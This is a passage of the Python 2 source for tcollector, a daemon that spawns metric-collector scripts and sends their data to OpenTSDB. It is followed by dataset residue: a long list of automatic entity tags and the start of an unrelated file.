'default=%default')
parser.add_option('-v', dest='verbose', action='store_true', default=False,
help='Verbose mode (log debug messages).')
parser.add_option('-t', '--tag', dest='tags', action='append',
default=[], metavar='TAG',
help='Tags to append to all timeseries we send, '
'e.g.: -t TAG=VALUE -t TAG2=VALUE')
parser.add_option('-P', '--pidfile', dest='pidfile',
default='/var/run/tcollector.pid',
metavar='FILE', help='Write our pidfile')
parser.add_option('--dedup-interval', dest='dedupinterval', type='int',
default=300, metavar='DEDUPINTERVAL',
help='Number of seconds in which successive duplicate '
'datapoints are suppressed before sending to the TSD. '
'Use zero to disable. '
'default=%default')
parser.add_option('--evict-interval', dest='evictinterval', type='int',
default=6000, metavar='EVICTINTERVAL',
help='Number of seconds after which to remove cached '
'values of old data points to save memory. '
'default=%default')
parser.add_option('--allowed-inactivity-time', dest='allowed_inactivity_time', type='int',
default=ALLOWED_INACTIVITY_TIME, metavar='ALLOWEDINACTIVITYTIME',
help='How long to wait for datapoints before assuming '
                           'a collector is dead and restarting it. '
'default=%default')
parser.add_option('--remove-inactive-collectors', dest='remove_inactive_collectors', action='store_true',
default=False, help='Remove collectors not sending data '
'in the max allowed inactivity interval')
parser.add_option('--max-bytes', dest='max_bytes', type='int',
default=64 * 1024 * 1024,
help='Maximum bytes per a logfile.')
parser.add_option('--backup-count', dest='backup_count', type='int',
default=0, help='Maximum number of logfiles to backup.')
parser.add_option('--logfile', dest='logfile', type='str',
default=DEFAULT_LOG,
help='Filename where logs are written to.')
    parser.add_option('--reconnect-interval', dest='reconnectinterval', type='int',
                      default=0, metavar='RECONNECTINTERVAL',
                      help='Number of seconds after which the connection to '
                           'the TSD hostname reconnects itself. This is useful '
                           'when the hostname is a multiple A record (RRDNS).'
)
parser.add_option('--max-tags', dest='maxtags', type=int, default=8,
help='The maximum number of tags to send to our TSD Instances')
parser.add_option('--http', dest='http', action='store_true', default=False,
help='Send the data via the http interface')
parser.add_option('--http-username', dest='http_username', default=False,
help='Username to use for HTTP Basic Auth when sending the data via HTTP')
parser.add_option('--http-password', dest='http_password', default=False,
help='Password to use for HTTP Basic Auth when sending the data via HTTP')
parser.add_option('--ssl', dest='ssl', action='store_true', default=False,
help='Enable SSL - used in conjunction with http')
(options, args) = parser.parse_args(args=argv[1:])
if options.dedupinterval < 0:
parser.error('--dedup-interval must be at least 0 seconds')
if options.evictinterval <= options.dedupinterval:
parser.error('--evict-interval must be strictly greater than '
'--dedup-interval')
if options.reconnectinterval < 0:
parser.error('--reconnect-interval must be at least 0 seconds')
# We cannot write to stdout when we're a daemon.
if (options.daemonize or options.max_bytes) and not options.backup_count:
options.backup_count = 1
return (options, args)
def daemonize():
"""Performs the necessary dance to become a background daemon."""
if os.fork():
os._exit(0)
os.chdir("/")
os.umask(022)
os.setsid()
os.umask(0)
if os.fork():
os._exit(0)
stdin = open(os.devnull)
stdout = open(os.devnull, 'w')
os.dup2(stdin.fileno(), 0)
os.dup2(stdout.fileno(), 1)
os.dup2(stdout.fileno(), 2)
stdin.close()
stdout.close()
os.umask(022)
for fd in xrange(3, 1024):
try:
os.close(fd)
except OSError: # This FD wasn't opened...
pass # ... ignore the exception.
def setup_python_path(collector_dir):
"""Sets up PYTHONPATH so that collectors can easily import common code."""
mydir = os.path.dirname(collector_dir)
libdir = os.path.join(mydir, 'collectors', 'lib')
if not os.path.isdir(libdir):
return
pythonpath = os.environ.get('PYTHONPATH', '')
if pythonpath:
pythonpath += ':'
pythonpath += mydir
os.environ['PYTHONPATH'] = pythonpath
LOG.debug('Set PYTHONPATH to %r', pythonpath)
def main(argv):
"""The main tcollector entry point and loop."""
options, args = parse_cmdline(argv)
if options.daemonize:
daemonize()
setup_logging(options.logfile, options.max_bytes or None,
options.backup_count or None)
if options.verbose:
LOG.setLevel(logging.DEBUG) # up our level
if options.pidfile:
write_pid(options.pidfile)
# validate everything
tags = {}
for tag in options.tags:
if re.match('^[-_.a-z0-9]+=\S+$', tag, re.IGNORECASE) is None:
assert False, 'Tag string "%s" is invalid.' % tag
k, v = tag.split('=', 1)
if k in tags:
assert False, 'Tag "%s" already declared.' % k
tags[k] = v
if not 'host' in tags and not options.stdin:
tags['host'] = socket.gethostname()
LOG.warning('Tag "host" not specified, defaulting to %s.', tags['host'])
options.cdir = os.path.realpath(options.cdir)
if not os.path.isdir(options.cdir):
LOG.fatal('No such directory: %s', options.cdir)
return 1
modules = load_etc_dir(options, tags)
setup_python_path(options.cdir)
# gracefully handle death for normal termination paths and abnormal
atexit.register(shutdown)
for sig in (signal.SIGTERM, signal.SIGINT):
signal.signal(sig, shutdown_signal)
# at this point we're ready to start processing, so start the ReaderThread
# so we can have it running and pulling in data for us
reader = ReaderThread(options.dedupinterval, options.evictinterval)
reader.start()
# prepare list of (host, port) of TSDs given on CLI
if not options.hosts:
options.hosts = [(options.host, options.port)]
else:
def splitHost(hostport):
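            """Parses 'host[:port]', including bracketed IPv6 such as
            '[::1]:4242', into a (host, port) tuple; e.g.
            'tsd1:4242' -> ('tsd1', 4242)."""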
if ":" in hostport:
# Check if we have an IPv6 address.
if hostport[0] == "[" and "]:" in hostport:
host, port = hostport.split("]:")
host = host[1:]
else:
host, port = hostport.split(":")
return (host, int(port))
return (hostport, DEFAULT_PORT)
options.hosts = [splitHost(host) for host in options.hosts.split(",")]
if options.host != "localhost" or options.port != DEFAULT_PORT:
options.hosts.append((options.host, options.port))
# and setup the sender to start writing out to the tsd
sender = SenderThread(reader, options.dryrun, options.hosts,
not options.no_tcollector_stats, tags, options.reconnectinterval,
options.http, options.http_username,
options.http_password, options.ssl, options.maxtags)
sender.start()
LOG.info('SenderThread startup complete')
# if we're in stdin mode, build a stdin collector and just join on the
# reader thread since there's nothing else for us to do here
if options.stdin:
register_collector(StdinCollector())
stdin_loop(options, modules, sender, tags)
else:
sys.stdin.close()
main_loop(options, modules, sender, tags)
# We're exiting, make sure we don't leave any collector behind.
for col in all_living_collectors():
col.shutdown()
LOG.debug('Shutting down -- joining the reader thread.')
reader.join()
LOG.debug('Shutting down -- joining the sender thread.')
sender.join()
def stdin_loop(options, modules, sender, tags):
"""The main loop of the program that runs when we are in stdin mode."""
global ALIVE
next_heartbeat = int(time.time() + 600)
while ALIVE:
time.sleep(15)
reload_changed_config_modules(modules, options, sender, tags)
now = int(time.time())
if now >= next_heartbeat:
LOG.info('Heartbeat (%d collectors running)'
% sum(1 for col in all_living_collectors()))
next_heartbeat = now + 600
def main_loop(options, modules, sender, tags):
"""The main loop of the program that runs when we're not in stdin mode."""
next_heartbeat = int(time.time() + 600)
while ALIVE:
populate_collectors(options.cdir)
reload_changed_config_modules(modules, options, sender, tags)
reap_children()
check_children(options)
spawn_children()
time.sleep(15)
now = int(time.time())
if now >= next_heartbeat:
LOG.info('Heartbeat (%d collectors running)'
% sum(1 for col in all_living_collectors()))
next_heartbeat = now + 600
def list_config_modules(etcdir):
"""Returns an iterator that yields the name of all the config modules."""
if not os.path.isdir(etcdir):
return iter(()) # Empty iterator.
return (name for name in os.listdir(etcdir)
if (name.endswith('.py')
and os.path.isfile(os.path.join(etcdir, name))))
def load_etc_dir(options, tags):
"""Loads any Python module from tcollector's own 'etc' directory.
Returns: A dict of path -> (module, timestamp).
"""
etcdir = os.path.join(options.cdir, 'etc')
sys.path.append(etcdir) # So we can import modules from the etc dir.
modules = {} # path -> (module, timestamp)
for name in list_config_modules(etcdir):
path = os.path.join(etcdir, name)
module = load_config_module(name, options, tags)
modules[path] = (module, os.path.getmtime(path))
return modules
def load_config_module(name, options, tags):
"""Imports the config module of the given name
The 'name' argument can be a string, in which case the module will be
loaded by name, or it can be a module object, in which case the module
will get reloaded.
If the module has an 'onload' function, calls it.
Returns: the reference to the module loaded.
"""
if isinstance(name, str):
LOG.info('Loading %s', name)
d = {}
# Strip the trailing .py
module = __import__(name[:-3], d, d)
else:
module = reload(name)
onload = module.__dict__.get('onload')
if callable(onload):
try:
onload(options, tags)
except:
LOG.fatal('Exception while loading %s', name)
raise
return module
def reload_changed_config_modules(modules, options, sender, tags):
"""Reloads any changed modules from the 'etc' directory.
Args:
cdir: The path to the 'collectors' directory.
modules: A dict of path -> (module, timestamp).
Returns: whether or not anything has changed.
"""
etcdir = os.path.join(options.cdir, 'etc')
current_modules = set(list_config_modules(etcdir))
current_paths = set(os.path.join(etcdir, name)
for name in current_modules)
changed = False
# Reload any module that has changed.
for path, (module, timestamp) in modules.iteritems():
if path not in current_paths: # Module was removed.
continue
mtime = os.path.getmtime(path)
if mtime > timestamp:
LOG.info('Reloading %s, file has changed', path)
module = load_config_module(module, options, tags)
modules[path] = (module, mtime)
changed = True
# Remove any module that has been removed.
for path in set(modules).difference(current_paths):
LOG.info('%s has been removed, tcollector should be restarted', path)
del modules[path]
changed = True
# Check for any modules that may have been added.
for name in current_modules:
path = os.path.join(etcdir, name)
if path not in modules:
module = load_config_module(name, options, tags)
modules[path] = (module, os.path.getmtime(path))
changed = True
return changed
def write_pid(pidfile):
"""Write our pid to a pidfile."""
f = open(pidfile, "w")
try:
f.write(str(os.getpid()))
finally:
f.close()
def all_collectors():
"""Generator to return all collectors."""
return COLLECTORS.itervalues()
# collectors that are not marked dead
def all_valid_collectors():
"""Generator to return all defined collectors that haven't been marked
dead in the past hour, allowing temporarily broken collectors a
chance at redemption."""
now = int(time.time())
for col in all_collectors():
if not col.dead or (now - col.lastspawn > 3600):
yield col
# collectors that have a process attached (currently alive)
def all_living_collectors():
"""Generator to return all defined collectors that have
an active process."""
for col in all_collectors():
if col.proc is not None:
yield col
def shutdown_signal(signum, frame):
"""Called when we get a signal and need to terminate."""
LOG.warning("shutting down, got signal %d", signum)
shutdown()
def kill(proc, signum=signal.SIGTERM):
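    # Collectors are started in their own session (preexec_fn=os.setsid in
    # spawn_collector), so signalling the process group also reaches any
    # children the collector itself forked.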
os.killpg(proc.pid, signum)
def shutdown():
"""Called by atexit and when we receive a signal, this ensures we properly
terminate any outstanding children."""
global ALIVE
# prevent repeated calls
if not ALIVE:
return
# notify threads of program termination
ALIVE = False
LOG.info('shutting down children')
# tell everyone to die
for col in all_living_collectors():
col.shutdown()
LOG.info('exiting')
sys.exit(1)
def reap_children():
"""When a child process dies, we have to determine why it died and whether
or not we need to restart it. This method manages that logic."""
for col in all_living_collectors():
now = int(time.time())
# FIXME: this is not robust. the asyncproc module joins on the
# reader threads when you wait if that process has died. this can cause
# slow dying processes to hold up the main loop. good for now though.
status = col.proc.poll()
if status is None:
continue
col.proc = None
# behavior based on status. a code 0 is normal termination, code 13
# is used to indicate that we don't want to restart this collector.
# any other status code is an error and is logged.
if status == 13:
LOG.info('removing %s from the list of collectors (by request)',
col.name)
col.dead = True
elif status != 0:
LOG.warning('collector %s terminated after %d seconds with '
'status code %d, marking dead',
col.name, now - col.lastspawn, status)
col.dead = True
else:
register_collector(Collector(col.name, col.interval, col.filename,
col.mtime, col.lastspawn))
def check_children(options):
"""When a child process hasn't received a datapoint in a while,
assume it's died in some fashion and restart it."""
for col in all_living_collectors():
now = int(time.time())
if col.last_datapoint < (now - options.allowed_inactivity_time):
# It's too old, kill it
LOG.warning('Terminating collector %s after %d seconds of inactivity',
col.name, now - col.last_datapoint)
col.shutdown()
if not options.remove_inactive_collectors:
register_collector(Collector(col.name, col.interval, col.filename,
col.mtime, col.lastspawn))
def set_nonblocking(fd):
"""Sets the given file descriptor to non-blocking mode."""
fl = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, fl)
def spawn_collector(col):
"""Takes a Collector object and creates a process for it."""
LOG.info('%s (interval=%d) needs to be spawned', col.name, col.interval)
# FIXME: do custom integration of Python scripts into memory/threads
# if re.search('\.py$', col.name) is not None:
# ... load the py module directly instead of using a subprocess ...
try:
col.proc = subprocess.Popen(col.filename, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
preexec_fn=os.setsid)
except OSError, e:
LOG.error('Failed to spawn collector %s: %s' % (col.filename, e))
return
    # Record the spawn time only now that the process has actually started;
    # respawn scheduling and dead-collector redemption both rely on
    # col.lastspawn being meaningful.
col.lastspawn = int(time.time())
set_nonblocking(col.proc.stdout.fileno())
set_nonblocking(col.proc.stderr.fileno())
if col.proc.pid > 0:
col.dead = False
LOG.info('spawned %s (pid=%d)', col.name, col.proc.pid)
return
# FIXME: handle errors better
LOG.error('failed to spawn collector: %s', col.filename)
def spawn_children():
"""Iterates over our defined collectors and performs the logic to
determine if we need to spawn, kill, or otherwise take some
action on them."""
if not ALIVE:
return
for col in all_valid_collectors():
now = int(time.time())
if col.interval == 0:
if col.proc is None:
spawn_collector(col)
elif col.interval <= now - col.lastspawn:
if col.proc is None:
spawn_collector(col)
continue
        # I'm not very satisfied with this path. It seems fragile and
        # overly complex; maybe we should just rely on the asyncproc
        # terminate method, but that would make the main tcollector
        # block until it dies... :|
if col.nextkill > now:
continue
if col.killstate == 0:
LOG.warning('warning: %s (interval=%d, pid=%d) overstayed '
'its welcome, SIGTERM sent',
col.name, col.interval, col.proc.pid)
kill(col.proc)
col.nextkill = now + 5
col.killstate = 1
elif col.killstate == 1:
LOG.error('error: %s (interval=%d, pid=%d) still not dead, '
'SIGKILL sent',
col.name, col.interval, col.proc.pid)
kill(col.proc, signal.SIGKILL)
col.nextkill = now + 5
col.killstate = 2
else:
LOG.error('error: %s (interval=%d, pid=%d) needs manual '
'intervention to kill it',
col.name, col.interval, col.proc.pid)
col.nextkill = now + 300
def populate_collectors(coldir):
"""Maintains our internal list of valid collectors. This walks the
collector directory and looks for files. In subsequent calls, this
also looks for changes to the files -- new, removed, or updated files,
and takes the right action to bring the state of our running processes
in line with the filesystem."""
global GENERATION
GENERATION += 1
    # get numerics from scriptdir, we're only set up to handle numeric paths
# which define intervals for our monitoring scripts
for interval in os.listdir(coldir):
if not interval.isdigit():
continue
interval = int(interval)
for colname in os.listdir('%s/%d' % (coldir, interval)):
if colname.startswith('.'):
continue
filename = '%s/%d/%s' % (coldir, interval, colname)
if os.path.isfile(filename) and os.access(filename, os.X_OK):
mtime = os.path.getmtime(filename)
# if this collector is already 'known', then check if it's
# been updated (new mtime) so we can kill off the old one
# (but only if it's interval 0, else we'll just get
# it next time it runs)
if colname in COLLECTORS:
col = COLLECTORS[colname]
# if we get a dupe, then ignore the one we're trying to
# add now. there is probably a more robust way of doing
# this...
if col.interval != interval:
LOG.error('two collectors with the same name %s and '
'different intervals %d and %d',
colname, interval, col.interval)
continue
# we have to increase the generation or we will kill
# this script again
col.generation = GENERATION
if col.mtime < mtime:
LOG.info('%s has been updated on disk', col.name)
col.mtime = mtime
if not col.interval:
col.shutdown()
LOG.info('Respawning %s', col.name)
register_collector(Collector(colname, interval,
filename, mtime))
else:
register_collector(Collector(colname, interval, filename,
mtime))
# now iterate over everybody and look for old generations
to_delete = []
for col in all_collectors():
if col.generation < GENERATION:
LOG.info('collector %s removed from the filesystem, forgetting',
col.name)
col.shutdown()
to_delete.append(col.name)
for name in to_delete:
del COLLECTORS[name]
if __name__ == '__main__':
sys.exit(main(sys.argv))
| 58,560 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Mark Smith dummy@email.com'], ['DATE_TIME', 'September 2020'], ['PERSON', 'Args'], ['LOCATION', 'del self.values[key]'], ['LOCATION', 'self.datalines.append(line.rstrip'], ['PERSON', 'Args'], ['DATE_TIME', 'this many seconds'], ['PERSON', 'Parses'], ['DATE_TIME', 'every 10 minutes'], ['DATE_TIME', 'the beginning/end'], ['DATE_TIME', 'Fall'], ['PERSON', 'dryrun'], ['PERSON', 'Args'], ['PERSON', 'dryrun'], ['DATE_TIME', 'seconds'], ['PERSON', 'hostport'], ['LOCATION', 'self.host'], ['PERSON', "LOG.info('Blacklisting"], ['LOCATION', 'self.host'], ['DATE_TIME', '5\n seconds'], ['DATE_TIME', '5 more seconds'], ['PERSON', 'self.maintain_conn'], ['PERSON', 'SenderThread'], ['PERSON', 'SenderThread'], ['DATE_TIME', 'less than a minute ago'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['PERSON', 'LOG.debug("Sending'], ['URL', 'LOG.de'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['URL', 'LOG.de'], ['URL', 'urllib2.HT'], ['URL', 'LOG.er'], ['PERSON', 'LOG.addHandler(ch'], ['LOCATION', 'parse_cmdline(argv'], ['PERSON', 'Parses'], ['PERSON', "metavar='HOST"], ['PERSON', "metavar='FILE"], ['DATE_TIME', 'seconds'], ['LOCATION', "metavar='EVICTINTERVAL"], ['DATE_TIME', 'seconds'], ['LOCATION', "dest='allowed_inactivity_time"], ['DATE_TIME', "help='Remove"], ['PERSON', 'max'], ['PERSON', "type='str"], ['DATE_TIME', 'seconds'], ['PERSON', "help='The"], ['PERSON', "dest='http_password"], ['DATE_TIME', "at least 0 seconds'"], ['DATE_TIME', "at least 0 seconds'"], ['PERSON', 'mydir = os.path.dirname(collector_dir'], ['PERSON', 'libdir = os.path.join(mydir'], ['PERSON', "LOG.fatal('No"], ['PERSON', 'options.cdir'], ['LOCATION', 'options.http_username'], ['PERSON', 'all_living_collectors'], ['PERSON', 'time.sleep(15'], ['PERSON', 'all_living_collectors'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'Args'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'del modules[path'], ['DATE_TIME', 'the past hour'], ['PERSON', 'currenty'], ['DATE_TIME', 'seconds'], ['DATE_TIME', 'seconds'], ['LOCATION', 'fcntl'], ['LOCATION', 'fcntl'], ['LOCATION', "os.listdir('%s/%d"], ['PERSON', 'X_OK'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['LOCATION', 'del COLLECTORS[name]'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'tcollector.py'], ['URL', 'email.com'], ['URL', 'logging.ge'], ['URL', 'collector.na'], ['URL', 'collector.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.sh'], ['URL', 'collector.na'], ['URL', 'LOG.er'], ['URL', 'self.na'], ['URL', 'self.int'], ['URL', 'self.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.ne'], ['URL', 'self.ki'], ['URL', 'self.de'], ['URL', 'self.mt'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.la'], ['URL', 'self.proc.stderr.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.na'], ['URL', 'self.proc.stdout.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.buffer.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'LOG.in'], ['URL', 'self.pro'], ['URL', 'self.na'], ['URL', 
'time.sl'], ['URL', 'self.pro'], ['URL', 'signal.SI'], ['URL', 'self.pro'], ['URL', 'self.values.ke'], ['URL', 'self.va'], ['URL', 'self.va'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'sys.stdin.re'], ['URL', 'line.rs'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.de'], ['URL', 'LOG.de'], ['URL', 'col.co'], ['URL', 'self.pro'], ['URL', 'self.de'], ['URL', 'time.sl'], ['URL', 'self.li'], ['URL', 'col.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 're.ma'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'parsed.gr'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'col.va'], ['URL', 'self.li'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'tags.it'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'random.sh'], ['URL', 'self.cu'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'random.sh'], ['URL', 'hosts.cl'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'hosts.ad'], ['URL', 'self.ma'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.ht'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'socket.er'], ['URL', 'self.tsd.re'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'self.se'], ['URL', 'self.la'], ['URL', 'self.ht'], ['URL', 'self.ve'], ['URL', 'LOG.de'], ['URL', 'time.sl'], ['URL', 'socket.ge'], ['URL', 'socket.AF'], ['URL', 'socket.SO'], ['URL', 'socket.ga'], ['URL', 'LOG.de'], ['URL', 'socket.so'], ['URL', 'self.tsd.se'], ['URL', 'self.tsd.co'], ['URL', 'LOG.de'], ['URL', 'socket.er'], ['URL', 'self.tsd.cl'], ['URL', 'LOG.er'], ['URL', 'self.se'], ['URL', 'self.ht'], ['URL', 'self.se'], ['URL', 'logging.DE'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'LOG.de'], ['URL', 'self.ad'], ['URL', 'self.se'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'self.se'], ['URL', 'socket.er'], ['URL', 'LOG.er'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'tags.st'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'tags.it'], ['URL', 'LOG.er'], ['URL', 'urllib2.Re'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'response.ge'], ['URL', 'self.se'], ['URL', 'response.ge'], ['URL', 'LOG.se'], ['URL', 'logging.IN'], ['URL', 'logging.St'], 
['URL', 'sys.st'], ['URL', 'ch.se'], ['URL', 'logging.Fo'], ['URL', 'LOG.ad'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'sys.ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.re'], ['URL', 'parser.er'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ba'], ['URL', 'os.fo'], ['URL', 'os.ch'], ['URL', 'os.se'], ['URL', 'os.fo'], ['URL', 'os.de'], ['URL', 'os.de'], ['URL', 'stdin.fi'], ['URL', 'stdout.fi'], ['URL', 'stdout.fi'], ['URL', 'stdin.cl'], ['URL', 'stdout.cl'], ['URL', 'os.cl'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.environ.ge'], ['URL', 'LOG.de'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ve'], ['URL', 'LOG.se'], ['URL', 'logging.DE'], ['URL', 're.ma'], ['URL', 'options.st'], ['URL', 'socket.ge'], ['URL', 'options.cd'], ['URL', 'os.path.re'], ['URL', 'options.cd'], ['URL', 'os.path.is'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'atexit.re'], ['URL', 'signal.SI'], ['URL', 'signal.SI'], ['URL', 'signal.si'], ['URL', 'options.de'], ['URL', 'reader.st'], ['URL', 'options.no'], ['URL', 'options.re'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ma'], ['URL', 'sender.st'], ['URL', 'LOG.in'], ['URL', 'options.st'], ['URL', 'sys.stdin.cl'], ['URL', 'col.sh'], ['URL', 'LOG.de'], ['URL', 'reader.jo'], ['URL', 'LOG.de'], ['URL', 'sender.jo'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'options.cd'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'os.path.is'], ['URL', 'os.li'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'os.path.jo'], ['URL', 'modules.it'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 'os.path.ge'], ['URL', 'os.ge'], ['URL', 'f.cl'], ['URL', 'COLLECTORS.it'], ['URL', 'col.de'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'os.ki'], ['URL', 'LOG.in'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'col.la'], ['URL', 'options.al'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.sh'], ['URL', 'options.re'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 're.se'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.fi'], ['URL', 'os.se'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.la'], ['URL', 'col.proc.stdout.fi'], ['URL', 'col.proc.stderr.fi'], ['URL', 'col.pro'], ['URL', 
'col.de'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.int'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'os.li'], ['URL', 'interval.is'], ['URL', 'os.li'], ['URL', 'colname.st'], ['URL', 'os.path.is'], ['URL', 'os.ac'], ['URL', 'os.path.ge'], ['URL', 'col.int'], ['URL', 'LOG.er'], ['URL', 'col.int'], ['URL', 'col.ge'], ['URL', 'col.mt'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.mt'], ['URL', 'col.int'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.ge'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.sh'], ['URL', 'col.na'], ['URL', 'sys.ar']] |
15 | import media
import fav_movies_web
